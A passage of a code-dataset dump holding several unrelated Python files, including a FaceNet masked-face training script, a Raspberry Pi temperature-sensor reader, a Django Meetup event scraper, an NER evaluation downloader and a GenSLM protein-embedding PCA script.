tf.cos(m1_theta_plus_m3)\n prelogits = tf.where(cond, cos_m1_theta_plus_m3 - m2, cos_m1_theta_plus_m3) * s\n\n return prelogits\n\n #----functions\n def log_update(self,content,para_dict):\n for key, value in para_dict.items():\n content[key] = value\n\n return content\n\n def evaluation(self,predictions,labels):\n count = 0\n for i in range(predictions.shape[0]):\n if np.argmax(predictions[i]) == labels[i]:\n count += 1\n\n return count\n\n def get_4D_data(self,paths, img_shape, process_dict=None):\n # ----var\n re_array = []\n processing_enable = False\n x_range = 10\n y_range = 20\n flip_list = [1, 0]\n kernel_list = [1, 3, 5, 7]\n\n # ----create default np array\n batch_dim = [len(paths)]\n batch_dim.extend(img_shape)\n batch_data = np.zeros(batch_dim, dtype=np.float32)\n\n # ----check process_dict\n if isinstance(process_dict, dict):\n if len(process_dict) > 0:\n processing_enable = True # image processing is enabled\n\n for idx, path in enumerate(paths):\n img = cv2.imread(path)\n if img is None:\n print(\"read failed:\", path)\n else:\n # ----image processing\n if processing_enable is True:\n if 'rdm_crop' in process_dict.keys():\n if process_dict['rdm_crop'] is True:\n #img = cv2.resize(img,(width_rdm_crop,height_rdm_crop))\n\n # ----Find a random point\n x_start = np.random.randint(x_range)\n y_start = np.random.randint(y_range)\n\n # ----From the random point, crop the image\n img = img[y_start:, x_start:, :]\n if 'rdm_br' in process_dict.keys():\n if process_dict['rdm_br'] is True:\n mean_br = np.mean(img)\n br_factor = np.random.randint(mean_br * 0.7, mean_br * 1.3)\n img = np.clip(img / mean_br * br_factor, 0,\n 255) # the multiplication makes the numeric type become floating\n img = img.astype(np.uint8) # transform the numeric type to unsigned integer 8(UINT8)\n if 'rdm_mask' in process_dict.keys():\n if process_dict['rdm_mask'] is True:\n x_min, x_max, y_min, y_max, size = detect_mouth(img, self.detector, self.predictor)\n if size is not None:\n # ----random selection of face mask\n item_path = np.random.choice(self.mask_files)\n\n # ----face mask process\n item_img = cv2.imread(item_path, cv2.IMREAD_UNCHANGED)\n # item_img = mask_paths[which]\n #print(item_img.shape)\n item_img = cv2.resize(item_img, size)\n item_img_rgb = item_img[:, :, :3]\n # item_img_rgb = item_img_rgb[:,:,::-1]#transform the color format to RGB\n\n item_alpha_ch = item_img[:, :, 3]\n _, item_mask = cv2.threshold(item_alpha_ch, 220, 255, cv2.THRESH_BINARY)\n img_item = cv2.bitwise_and(item_img_rgb, item_img_rgb, mask=item_mask)\n\n # ----mouth part process\n roi = img[y_min:y_min + size[1], x_min:x_min + size[0]]\n item_mask_inv = cv2.bitwise_not(item_mask)\n roi = cv2.bitwise_and(roi, roi, mask=item_mask_inv)\n\n # ----addition of mouth and face mask\n dst = cv2.add(roi, img_item)\n img[y_min: y_min + size[1], x_min:x_min + size[0]] = dst\n\n if 'rdm_blur' in process_dict.keys():\n if process_dict['rdm_blur'] is True:\n kernel = tuple(np.random.choice(kernel_list, size=2))\n #print(\"kernel:\", kernel)\n img = cv2.GaussianBlur(img, kernel, 0, 0)\n\n if 'rdm_flip' in process_dict.keys():\n if process_dict['rdm_flip'] is True:\n flip_type = np.random.choice(flip_list)\n if flip_type == 1:\n img = cv2.flip(img, flip_type)\n if 'rdm_noise' in process_dict.keys():\n if process_dict['rdm_noise'] is True:\n uniform_noise = np.empty((img.shape[0], img.shape[1]), dtype=np.uint8)\n cv2.randu(uniform_noise, 0, 255)\n ret, impulse_noise = cv2.threshold(uniform_noise, 240, 255, cv2.THRESH_BINARY_INV)\n img = 
cv2.bitwise_and(img, img, mask=impulse_noise)\n if 'rdm_angle' in process_dict.keys():\n if process_dict['rdm_angle'] is True:\n angle = np.random.randint(-15, 15)\n img = cv2.resize(img, (img_shape[1], img_shape[0]))\n #print(img.shape)\n h, w = img.shape[:2]\n M = cv2.getRotationMatrix2D((w // 2, h // 2), angle, 1.0)\n img = cv2.warpAffine(img, M, (h, w))\n # ----\n img = cv2.resize(img, (img_shape[1], img_shape[0]))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n batch_data[idx] = img\n\n #re_array = np.array(re_array)\n\n return batch_data / 255\n\n def get_4D_data_2(self,paths, img_shape, process_dict=None):\n # ----var\n random_flip = False\n random_brightness = False\n random_crop = False\n random_angle = False\n random_noise = False\n flip_list = [1, 0]\n\n # ----create default np array\n batch_dim = [len(paths)]\n batch_dim.extend(img_shape)\n batch_data = np.zeros(batch_dim, dtype=np.float32)\n\n # ----update var\n if isinstance(process_dict, dict):\n if 'random_flip' in process_dict.keys():\n random_flip = process_dict['random_flip']\n if 'random_brightness' in process_dict.keys():\n random_brightness = process_dict['random_brightness']\n if 'random_crop' in process_dict.keys():\n random_crop = process_dict['random_crop']\n if 'random_angle' in process_dict.keys():\n random_angle = process_dict['random_angle']\n if 'random_noise' in process_dict.keys():\n random_noise = process_dict['random_noise']\n\n for idx, path in enumerate(paths):\n img = cv2.imread(path)\n if img is None:\n print(\"read failed:\", path)\n else:\n img = cv2.resize(img, (img_shape[1], img_shape[0]))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n # ----random brightness\n if random_brightness is True:\n mean_br = np.mean(img)\n br_factor = np.random.randint(mean_br * 0.7, mean_br * 1.3)\n img = np.clip(img / mean_br * br_factor, 0, 255)\n img = img.astype(np.uint8)\n\n # ----random crop\n if random_crop is True:\n # ----resize the image 1.15 times\n img = cv2.resize(img, None, fx=1.15, fy=1.15)\n\n # ----Find a random point\n y_range = img.shape[0] - img_shape[0]\n x_range = img.shape[1] - img_shape[1]\n x_start = np.random.randint(x_range)\n y_start = np.random.randint(y_range)\n\n # ----From the random point, crop the image\n img = img[y_start:y_start + img_shape[0], x_start:x_start + img_shape[1], :]\n\n # ----random flip\n if random_flip is True:\n flip_type = np.random.choice(flip_list)\n if flip_type == 1:\n img = cv2.flip(img, flip_type)\n\n # ----random angle\n if random_angle is True:\n angle = np.random.randint(-60, 60)\n height, width = img.shape[:2]\n M = cv2.getRotationMatrix2D((width // 2, height // 2), angle, 1.0)\n img = cv2.warpAffine(img, M, (width, height))\n\n # ----random noise\n if random_noise is True:\n uniform_noise = np.empty((img.shape[0], img.shape[1]), dtype=np.uint8)\n cv2.randu(uniform_noise, 0, 255)\n ret, impulse_noise = cv2.threshold(uniform_noise, 240, 255, cv2.THRESH_BINARY_INV)\n img = cv2.bitwise_and(img, img, mask=impulse_noise)\n\n batch_data[idx] = img\n\n batch_data /= 255\n return batch_data\n\n def eval_on_lfw(self, sess, feed_dict, lfw_dir, batch_size=12):\n # ----Read the file containing the pairs used for testing\n time_eval = time.time()\n lfw_pairs_path = r'pairs.txt'\n pairs = read_pairs(os.path.expanduser(lfw_pairs_path))\n\n # ----Get the paths for the corresponding images\n paths, actual_issame = get_paths(os.path.expanduser(lfw_dir), pairs)\n\n # ----collect all embeddings\n iterations = math.ceil(len(paths) / batch_size)\n\n for i in 
range(iterations):\n n_start = i * batch_size\n n_end = np.minimum(i * batch_size + batch_size, len(paths))\n\n batch_data = self.get_4D_data(paths[n_start:n_end], self.model_shape[1:])\n\n feed_dict[self.tf_input] = batch_data\n sess_out = sess.run(self.embeddings, feed_dict=feed_dict)\n if i == 0:\n embeddings = sess_out\n else:\n embeddings = np.concatenate([embeddings, sess_out], axis=0)\n\n tpr, fpr, accuracy, val, val_std, far = evaluate(embeddings, actual_issame, nrof_folds=10,\n distance_metric=0,\n subtract_mean=False)\n\n print('Accuracy: %2.5f+-%2.5f' % (np.mean(accuracy), np.std(accuracy)))\n print('Validation rate: %2.5f+-%2.5f @ FAR=%2.5f' % (val, val_std, far))\n\n auc = metrics.auc(fpr, tpr)\n print('Area Under Curve (AUC): %1.3f' % auc)\n\n time_eval = time.time() - time_eval\n print(\"Eval on LFW time:\", time_eval)\n\n return np.mean(accuracy)\n\n def __get_label_dict(self,img_dir):\n label_dict = dict()\n count = 0\n for obj in os.scandir(img_dir):\n if obj.is_dir():\n label_dict[obj.name] = count\n count += 1\n if count == 0:\n print(\"No dir in the \",img_dir)\n return None\n else:\n return label_dict\n\n def __get_paths_labels(self,img_dir,label_dict,type='extend'):\n #----var\n img_format = {'png', 'jpg', 'bmp'}\n re_paths = list()\n re_labels = list()\n\n #----read dirs\n dirs = [obj.path for obj in os.scandir(img_dir) if obj.is_dir()]\n if len(dirs) == 0:\n print(\"No dirs in the \",img_dir)\n else:\n #-----read paths of each dir\n for dir_path in dirs:\n path_temp = [file.path for file in os.scandir(dir_path) if file.name.split(\".\")[-1] in img_format]\n if len(path_temp) == 0:\n print(\"No images in the \",dir_path)\n else:\n #----get the label number from class name\n label_num = dir_path.split(\"\\\\\")[-1]\n label_num = label_dict[label_num]\n #----create the label array\n label_temp = np.ones(len(path_temp),dtype=np.int32) * label_num\n\n #----collect paths and labels\n if type == 'append':\n re_paths.append(path_temp)\n re_labels.append(label_temp)\n elif type == 'extend':\n re_paths.extend(path_temp)\n re_labels.extend(label_temp)\n\n #----list to numpy array\n # re_paths = np.array(re_paths)\n # re_labels = np.array(re_labels)\n\n #----shuffle\n # indice = np.random.permutation(re_paths.shape[0])\n # re_paths = re_paths[indice]\n # re_labels = re_labels[indice]\n\n return re_paths, re_labels\n\n #----models\n def resnet_block(self,input_x, k_size=3,filters=32):\n net = tf.layers.conv2d(\n inputs=input_x,\n filters = filters,\n kernel_size=[k_size,k_size],\n kernel_regularizer=tf.keras.regularizers.l2(0.1),\n padding=\"same\",\n activation=tf.nn.relu\n )\n net = tf.layers.conv2d(\n inputs=net,\n filters=filters,\n kernel_size=[k_size, k_size],\n kernel_regularizer=tf.keras.regularizers.l2(0.1),\n padding=\"same\",\n activation=tf.nn.relu\n )\n\n net_1 = tf.layers.conv2d(\n inputs=input_x,\n filters=filters,\n kernel_size=[k_size, k_size],\n kernel_regularizer=tf.keras.regularizers.l2(0.1),\n padding=\"same\",\n activation=tf.nn.relu\n )\n\n add = tf.add(net,net_1)\n\n add_result = tf.nn.relu(add)\n\n return add_result\n\n def simple_resnet(self,tf_input,tf_keep_prob,class_num):\n net = self.resnet_block(tf_input,k_size=3,filters=16)\n net = tf.layers.max_pooling2d(inputs=net, pool_size=[2,2], strides=2)\n print(\"pool_1 shape:\",net.shape)\n\n net = self.resnet_block(net, k_size=3, filters=32)\n net = tf.layers.max_pooling2d(inputs=net, pool_size=[2, 2], strides=2)\n print(\"pool_2 shape:\", net.shape)\n\n net = self.resnet_block(net, k_size=3, 
filters=48)\n net = tf.layers.max_pooling2d(inputs=net, pool_size=[2, 2], strides=2)\n print(\"pool_3 shape:\", net.shape)\n\n net = self.resnet_block(net, k_size=3, filters=64)\n net = tf.layers.max_pooling2d(inputs=net, pool_size=[2, 2], strides=2)\n print(\"pool_4 shape:\", net.shape)\n\n #----flatten\n net = tf.layers.flatten(net)\n print(\"flatten shape:\",net.shape)\n\n #----dropout\n net = tf.nn.dropout(net,keep_prob=tf_keep_prob)\n\n #----FC\n net = tf.layers.dense(inputs=net,units=128,activation=tf.nn.relu)\n print(\"FC shape:\",net.shape)\n\n #----output\n # output = tf.layers.dense(inputs=net,units=class_num,activation=None)\n # print(\"output shape:\",output.shape)\n\n return net\n\n\nif __name__ == \"__main__\":\n # train_img_dir = r\"D:\\CASIA\\CASIA-WebFace\"\n train_img_dir = [r\"C:\\Users\\ztyam\\3D Objects\\DataSet\\CASIA-WebFace_aligned\"\n ]\n test_img_dir = r\"C:\\Users\\ztyam\\3D Objects\\DataSet\\lfw-alignment_2\"\n label_dict = None\n embed_length = 128\n get_image_type = 'append'#append #extend\n\n para_dict = {\"train_img_dir\":train_img_dir,\"test_img_dir\":test_img_dir,\"label_dict\":label_dict,'get_image_type':get_image_type}\n\n cls = Facenet(para_dict)\n\n model_shape = [None,112,112,3]#at least[None,80,80,3] if you use inception_resnet_v1\n infer_method = \"inception_resnet_v1\" #\"inception_resnet_v2\" #inception_resnet_v1\n loss_method = \"cross_entropy\" #\"arc_loss\"#\"cross_entropy\"\n opti_method = \"adam\" #adagrad #adam\n learning_rate = 5e-4\n save_dir = r\"C:\\Users\\ztyam\\OneDrive - University of Florida\\0_UF Class\\2021 Spring\\03_Pattern Recognition\\Project\\TrainedModels\\FaceNet_masked_pic_aug2_new\"\n\n para_dict = {\"model_shape\":model_shape,\"infer_method\":infer_method,\"loss_method\":loss_method,\n \"opti_method\":opti_method,'learning_rate':learning_rate,\"save_dir\":save_dir,'embed_length':embed_length}\n cls.model_init(para_dict)\n\n epochs = 100\n GPU_ratio = None#0.1 ~ 0.9\n batch_size = 60#depends on your GPU resource. 
Set <= 96 if 6GB GPU using inception_resnet_v1\n    ratio = None\n    select_num = 4\n\n\n    random_flip = True\n    random_brightness = True\n    random_crop = True\n    random_angle = True\n    random_noise = True\n    aug_times = 4\n\n    process_dict = {\"rdm_flip\":random_flip,'rdm_br':random_brightness,'rdm_crop':random_crop,'rdm_angle':random_angle,\n                    'rdm_noise':random_noise}\n    if True in process_dict.values():\n        pass\n    else:\n        process_dict = None\n    para_dict = {'epochs':epochs, \"GPU_ratio\":GPU_ratio, \"batch_size\":batch_size,\"ratio\":ratio,'process_dict':process_dict,\n                 'select_num':select_num,'aug_times':aug_times}\n\n    cls.train(para_dict)\n","repo_name":"LIMONIC/Masked-face-recognition","sub_path":"FaceNet-train-data-augmentation2/facenet_train.py","file_name":"facenet_train.py","file_ext":"py","file_size_in_byte":40931,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"26531030000","text":"import smbus\nimport time\ndef read_adt7410():\n    word=bus.read_word_data(address_adt7410,register_adt7410)\n    data=(word & 0xff00)>>8 | (word & 0xff)<<8\n    data>>=3\n    if data & 0x1000 == 0: # the temperature >= 0.\n        temp=data*0.0625\n    else: # negative temperatures are stored as 13-bit two's complement\n        temp=((~data&0x1fff) + 1)*-0.0625\n    return temp\nbus=smbus.SMBus(1)\naddress_adt7410=0x48\nregister_adt7410=0x00\ntry:\n    while True:\n        value=read_adt7410()\n        print(value)\n        time.sleep(0.5)\nexcept KeyboardInterrupt:\n    pass\n","repo_name":"ouj-cs/ouj-cs","sub_path":"yk/raspi/p162_temperature.py","file_name":"p162_temperature.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"9902248935","text":"import matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport os\nfrom scisdk.scisdk import SciSDK\nfrom scisdk.scisdk_defines import *\n\nfig = plt.figure(\"Spectrum Data\")\nax1 = fig.add_subplot(1,1,1)\n\nsdk = SciSDK()\n\n# add new device\n#DT1260\nres = sdk.AddNewDevice(\"usb:10500\",\"dt1260\", \"./DT1260RegisterFile.json\",\"board0\")\n#DT5560\n#res = sdk.AddNewDevice(\"192.168.50.10:8888\",\"DT5560\", \"./DT5560RegisterFile.json\",\"board0\")\n#DT5550\n#res = sdk.AddNewDevice(\"usb:11000\",\"DT5550\", \"./DT5550RegisterFile.json\",\"board0\")\n#V2740\n#res = sdk.AddNewDevice(\"192.168.50.10\",\"V2740\", \"./V2740RegisterFile.json\",\"board0\")\n\nif not res == 0:\n    print(\"Program exiting due to a connection error\")\n    exit()\n\n# configure firmware registers\nsdk.SetRegister(\"board0:/Registers/noisepower\", 100)\nsdk.SetRegister(\"board0:/Registers/centroid\", 1000)\n\n# set board parameters\nsdk.SetParameterString(\"board0:/MMCComponents/Spectrum_0.rebin\", \"0\")\nsdk.SetParameterString(\"board0:/MMCComponents/Spectrum_0.limitmode\", \"freerun\")\nsdk.SetParameterString(\"board0:/MMCComponents/Spectrum_0.limit\", \"100\")\n\n# execute command reset\nsdk.ExecuteCommand(\"board0:/MMCComponents/Spectrum_0.reset\", \"\")\n\n# execute command start\nsdk.ExecuteCommand(\"board0:/MMCComponents/Spectrum_0.start\", \"\")\n\n\n# allocate buffer\nres, buf = sdk.AllocateBuffer(\"board0:/MMCComponents/Spectrum_0\")\n\n\ndef updateGraph(i, buffer): # callback that plots the newly read data on the graph\n    res, buffer = sdk.ReadData(\"board0:/MMCComponents/Spectrum_0\", buffer)# read data from board\n    if res == 0:\n        xar = []\n        yar = []\n        for index in range(buffer.info.valid_bins):\n            xar.append(index)\n            yar.append(buffer.data[index])\n        ax1.clear()\n        
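# redraw the axes with the spectrum bins just read from the board\n        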
ax1.plot(xar,yar)\n\n# update graph every 50ms\nani = animation.FuncAnimation(fig, updateGraph, fargs=[buf,],interval=100)\n# updateGraph(None, buf, decimator)\nplt.show()\n","repo_name":"NuclearInstruments/SCISDK","sub_path":"examples/components/Python/Spectrum/PlotGraph/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"13197961697","text":"import os\nimport sys\nimport requests\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urljoin, urlparse\n\n#============================================ set parameters here =========================================\n\n\n# links for gold-standard files and model prediction file to be downloaded from\ngold_url = 'https://github.com/clamsproject/clams-aapb-annotations/tree/main/golds/ner/2022-jun-namedentity'\ntest_url = 'https://github.com/JinnyViboonlarp/ner-evaluation/tree/main/testfiles'\n\n# local folders to save the files from gold_url and test_url respectively\ngold_folder = 'goldfiles'\ntest_folder = 'testfiles'\n\n# path to save NER evaluation result\nresultpath = 'result.txt'\n\n#============================================ set parameters end here ====================================\n\ndef download(url=None, folder_name=None):\n # code adapt from Angela Lam's\n\n # Extract the repository name from the URL, name would be the phrase after the last \"/\"\n repo_name = urlparse(url).path.split('/')[-1]\n \n # Create a new directory to store the downloaded files on local computer\n if folder_name == None:\n folder_name = repo_name\n if not os.path.exists(folder_name):\n os.mkdir(folder_name)\n\n # Check if the directory is empty\n if not (len(os.listdir(folder_name)) == 0):\n raise Exception(\"The folder '\" + folder_name + \"' already exists and is not empty\")\n\n # Send a GET request to the repository URL and extract the HTML content\n response = requests.get(url)\n soup = BeautifulSoup(response.text, 'html.parser')\n\n # Find all links to .mmif, .txt, .md and .ann files in the HTML content\n links = [a['href'] for a in soup.find_all('a', href=True) if a['href'].endswith(('.mmif', '.txt', '.md', '.ann'))]\n\n # Download each file in the links list into the created folder\n for link in links:\n raw_url = urljoin('https://raw.githubusercontent.com/', link.replace('/blob/', '/'))\n file_name = os.path.basename(link)\n file_path = os.path.join(folder_name, file_name)\n with open(file_path, 'wb') as file:\n response = requests.get(raw_url)\n file.write(response.content)\n \n\nif __name__ == \"__main__\":\n\n download(gold_url, gold_folder)\n download(test_url, test_folder)\n os.system(\"python evaluate.py \" + gold_folder + \"/ \" + test_folder + \"/ \" + resultpath)\n\n # edit the text file to add in the url paths to the github repos\n with open(resultpath, 'r') as fh_in:\n s = fh_in.read()\n s = (\"link containing gold-standard files: \" + gold_url + \"\\n\" +\\\n \"link containing model prediction files: \" + test_url + \"\\n\\n\" + s)\n with open(resultpath, 'w') as fh_out:\n fh_out.write(s)\n","repo_name":"JinnyViboonlarp/ner-evaluation","sub_path":"download_and_evaluate.py","file_name":"download_and_evaluate.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6164507315","text":"from django.contrib.gis.db import models\nfrom location_field.models.spatial import LocationField\nfrom .validators import 
*\nfrom django.db.models.signals import pre_save, post_save\nfrom django.dispatch import receiver\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom icalendar import Calendar\nfrom website.utils import retry_request\n\n\nclass MeetupGroup(models.Model):\n\n url = models.CharField(max_length=100, unique=True, validators=[validate_meetup_url_exists])\n name = models.CharField(max_length=100)\n is_blacklisted = models.BooleanField(default=False)\n location = models.PointField(null=True)\n\n class Meta:\n verbose_name_plural = \"Meetup Groups\"\n\n def __str__(self):\n return self.url\n\n\nclass TechEvent(models.Model):\n\n MEETUP = 'MU'\n EVENTBRITE = 'EB'\n ICAL = 'IC'\n CUSTOM = 'CU'\n\n SOURCE_CHOICES = (\n (MEETUP, 'Meetup.com'),\n (EVENTBRITE, 'EventBrite'),\n (ICAL, '.ics calendar'),\n (CUSTOM, 'Custom one-off event'),\n )\n\n uniqid = models.CharField(max_length=50, unique=True)\n name = models.CharField(max_length=255)\n url = models.URLField()\n begin_time = models.DateTimeField('begin time', db_index=True)\n source = models.CharField(max_length=2,\n choices=SOURCE_CHOICES,\n default=CUSTOM)\n meetup_group = models.ForeignKey(MeetupGroup,\n null=True,\n blank=True,\n on_delete=models.CASCADE)\n is_active = models.BooleanField(default=True)\n address = models.CharField(max_length=255)\n city = models.CharField(max_length=100, null=True)\n postal_code = models.CharField(max_length=20, null=True)\n country = models.CharField(max_length=50, null=True)\n location = LocationField(\n based_fields=['address', 'city', 'postal_code'],\n zoom=7,\n default='POINT (0.0 0.0)'\n )\n\n class Meta:\n verbose_name_plural = \"Events\"\n\n def __str__(self):\n return self.name\n\n\nclass ParseError(models.Model):\n\n created_at = models.DateField()\n error_message = models.TextField()\n payload = models.TextField()\n is_resolved = models.BooleanField(default=False)\n\n class Meta:\n verbose_name_plural = 'Firehose Parse Errors'\n\n def __str__(self):\n return self.error_message\n\n\n@receiver(pre_save, sender=MeetupGroup)\ndef meetup_group_pre_save(sender, instance, **kwargs):\n\n if instance.is_blacklisted is False:\n\n url = 'https://www.meetup.com/%s' % instance.url\n\n r = retry_request(url)\n\n html = BeautifulSoup(r.text, features=\"html.parser\")\n\n res = html.findAll('meta', attrs={\"property\": \"geo.position\"})\n (lat, lng) = res[0]['content'].split(';')\n\n instance.name = html.h1.a.text[:255]\n\n instance.location = 'POINT(%s %s)' % (lng, lat)\n\n\n@receiver(post_save, sender=MeetupGroup)\ndef meetup_group_post_save(sender, instance, **kwargs):\n \"\"\"\n Download the current calendar for meetup groups just added using the\n admin.\n \"\"\"\n\n # If the meetup group is blacklisted, then we should delete all related\n # tech events.\n if instance.is_blacklisted is True:\n TechEvent.objects.filter(meetup_group_id=instance.id).delete()\n\n else:\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36',\n }\n group_calendar_url = 'http://www.meetup.com/%s/events/ical/' % instance.url\n\n r = requests.get(group_calendar_url, headers=headers)\n c = Calendar.from_ical(r.text)\n\n for i in c.walk():\n if i.name == 'VEVENT':\n\n uniqid = i['UID'].replace('event_', '').\\\n replace('@meetup.com', '')\n (lat, lng) = i['GEO'].to_ical().split(';')\n\n updated_values = {\n 'begin_time': i.get('DTSTART').dt,\n 'url': i['URL'][:200],\n 'name': i['SUMMARY'],\n 'source': 'MU',\n 'meetup_group_id': instance.id,\n 
'is_active': True,\n 'address': i.get('LOCATION', 'See event page for details')[:255],\n 'city': '',\n 'postal_code': '',\n 'country': '',\n 'location': 'POINT (%s %s)' % (lng, lat)\n }\n\n TechEvent.objects.update_or_create(\n uniqid=uniqid,\n defaults=updated_values)\n","repo_name":"undernewmanagement/3cosystem","sub_path":"src/apps/tech_events/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4682,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"14288713650","text":"def ReadFastaFile(filename):\n fileObj = open(filename, 'r')\n sequences = []\n seqFragments = []\n for line in fileObj:\n if line.startswith('>'):\n if seqFragments:\n sequence = ''.join(seqFragments)\n sequences.append(sequence)\n seqFragments = []\n else:\n seq = line.rstrip()\n seqFragments.append(seq)\n if seqFragments:\n sequence = ''.join(seqFragments)\n sequences.append(sequence)\n fileObj.close()\n return sequences\n#%% Lists of different protein family sequences. Each list has 200 seqs from Muscarinic acetylcholine receptor\n# Retinoid X receptor, and Retroviral VpR\n\nMAR = ReadFastaFile('/home/research/Desktop/ARCC/cancerai/sequence(1).txt')\nRXR = ReadFastaFile('/home/research/Desktop/ARCC/cancerai/sequence(2).txt')\nRVP = ReadFastaFile('/home/research/Desktop/ARCC/cancerai/sequence(3).txt')\n\nBCCT = ReadFastaFile('/home/research/Desktop/ARCC/cancerai/BCCT transporter family.txt')\nFMR = ReadFastaFile('/home/research/Desktop/ARCC/cancerai/Flagellar M-ring protein(DNA).txt')\nMET = ReadFastaFile('/home/research/Desktop/ARCC/cancerai/Metallothionein(DNA).txt')\n\nPorin = ReadFastaFile('/home/research/Desktop/ARCC/cancerai/Porin_family.txt')\n\naquaPorin = ReadFastaFile(\"/home/research/Desktop/ARCC/cancerai/Aquaporin Z (all alphas).txt\")\nLamBPorin = ReadFastaFile(\"/home/research/Desktop/ARCC/cancerai/Porin, LamB-type (all betas).txt\")\noprBPorin = ReadFastaFile(\"/home/research/Desktop/ARCC/cancerai/oprB porin (mix of betas and alphas).txt\")\n\n\nMAR_seq = MAR[:500]\nRXR_seq = RXR[:500]\nRVP_seq = RVP[:500]\nBCCT_seq = BCCT[:500]\nFMR_seq = FMR[:500]\nMET_seq = MET[:500]\nPOR_seq = Porin[:500]\n\nseq = MAR_seq + RXR_seq + RVP_seq\nseq_2 = BCCT_seq + FMR_seq + MET_seq\nseq_3 = seq + seq_2 + POR_seq + aquaPorin + LamBPorin + oprBPorin\n\n#%% Deploy model on each protein family sequence:\n\nimport torch\nimport numpy as np\nfrom torch.utils.data import DataLoader\nfrom genslm import GenSLM, SequenceDataset\n\ntorch.manual_seed(1)\n\nmodel = GenSLM(\"genslm_25M_patric\", model_cache_dir=\"/home/research/Desktop/ARCC/cancerai\")\n\ndevice = torch.device(\"cuda:0\")\nmodel = model.to(device)\nmodel.eval()\n\ndataset = SequenceDataset(seq_3, model.seq_length, model.tokenizer)\ndataloader = DataLoader(dataset, batch_size = 6, shuffle=False)\n\n# Compute averaged-embeddings for each input sequence\nembeddings = []\n\nwith torch.no_grad():\n for batch in dataloader:\n outputs = model(batch[\"input_ids\"].to(device), batch[\"attention_mask\"].to(device), output_hidden_states=True)\n # outputs.hidden_states shape: (layers, batch_size, sequence_length, hidden_size)\n emb = outputs.hidden_states[0].detach().cpu().numpy()\n # Compute average over sequence length\n emb = np.mean(emb, axis=1)\n embeddings.append(emb)\n torch.cuda.empty_cache()\n \n# Concatenate embeddings into an array of shape (num_sequences, hidden_size)\nembeddings = np.concatenate(embeddings)\nembeddings.shape\n#%%\n\n'''\nBelow are two versions of PCA on the embeddings. 
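The first draws a static\nmatplotlib 3D scatter of the first three components; the second builds the same scatter as an\ninteractive plotly figure and writes it to an HTML file.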
\n'''\n\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nimport pandas as pd\n#from mpl_toolkits import mplot3d\n#import mpld3\n\nPCA = PCA(n_components=3)\npca_proj = PCA.fit(embeddings)\nx = pca_proj.transform(embeddings) \n\n# build dataframe so that we can make the interactive plot:\ndf = pd.DataFrame({'x':x[:,0], 'y':x[:,1], 'z':x[:,2]})\n\nfig = plt.figure(dpi=100)\nax = plt.axes(projection='3d')\n\nax.scatter3D(x[:500,0], x[:500,1], x[:500,2], label='MAR', s=6, color='blue')\nax.scatter3D(x[500:1000,0], x[500:1000,1], x[500:1000,2], label='RXR', s=4, color='red')\nax.scatter3D(x[1000:1500,0], x[1000:1500,1], x[1000:1500,2], label='RVP', s=2, color='green')\nax.scatter3D(x[1500:2000,0], x[1500:2000,1], x[1500:2000,2], label='BCCT', s=2, color='purple')\nax.scatter3D(x[2000:2500,0], x[2000:2500,1], x[2000:2500,2], label='FMR', s=2, color='orange')\nax.scatter3D(x[2500:3000,0], x[2500:3000,1], x[2500:3000,2], label='MET', s=2, color='black')\n\n\nax.set_title('Protein Families: PCA on all embeddings at once') \nax.legend()\n\n#%%\nimport plotly.graph_objects as go\nfrom plotly.graph_objects import *\nimport plotly.express as px\n\nfig = go.Figure(data=[go.Scatter3d(\n x = x[:500,0],\n y = x[:500,1],\n z = x[:500,2],\n mode ='markers',\n name = 'Muscarinic Acetylcholine Receptor',\n marker = dict(\n size =1.5,\n color ='blue', \n )), \ngo.Scatter3d(\n x = x[500:1000,0],\n y = x[500:1000,1],\n z = x[500:1000,2],\n mode ='markers',\n name = 'Retroviral VpR',\n marker = dict(\n size = 1.5,\n color = 'red', \n )),\ngo.Scatter3d(\n x = x[1000:1500,0],\n y = x[1000:1500,1],\n z = x[1000:1500,2],\n mode ='markers',\n name = 'Retinoid X Receptor',\n marker = dict(\n size = 1.5,\n color ='green',\n )),\ngo.Scatter3d(\n x = x[1500:2000,0],\n y = x[1500:2000,1],\n z = x[1500:2000,2],\n mode ='markers',\n name = 'BCCT Transporter',\n marker = dict(\n size = 1.5,\n color ='purple', \n )),\ngo.Scatter3d(\n x = x[2000:2500,0],\n y = x[2000:2500,1],\n z = x[2000:2500,2],\n mode ='markers',\n name = 'Flagellar M-ring Protein (DNA)',\n marker = dict(\n size = 1.5,\n color ='orange',\n )),\ngo.Scatter3d(\n x = x[2500:3000,0],\n y = x[2500:3000,1],\n z = x[2500:3000,2],\n mode = 'markers',\n name = 'Metallothionein (DNA)',\n marker = dict(\n size = 1.5,\n color = 'black',\n )),\ngo.Scatter3d(\n x = x[3000:,0],\n y = x[3000:,1],\n z = x[3000:,2],\n mode = 'markers',\n name = 'Porin',\n marker = dict(\n size = 1.5,\n color = 'pink',\n )),\n ])\n\n# tight layout\nfig.update_layout(margin=dict(l=0, r=0, b=0, t=0))\nfig.write_html(\"/home/research/Desktop/ARCC/cancerai/figure1.html\") #Modifiy the html file\nfig.show()\n\n\n\n\n\n\n\n\n","repo_name":"cancer-ai/Embeddings","sub_path":"protein_families.py","file_name":"protein_families.py","file_ext":"py","file_size_in_byte":5865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71250658386","text":"\"\"\"\nPrint numbers in a square spiral, starting from 1.\n\n>>> 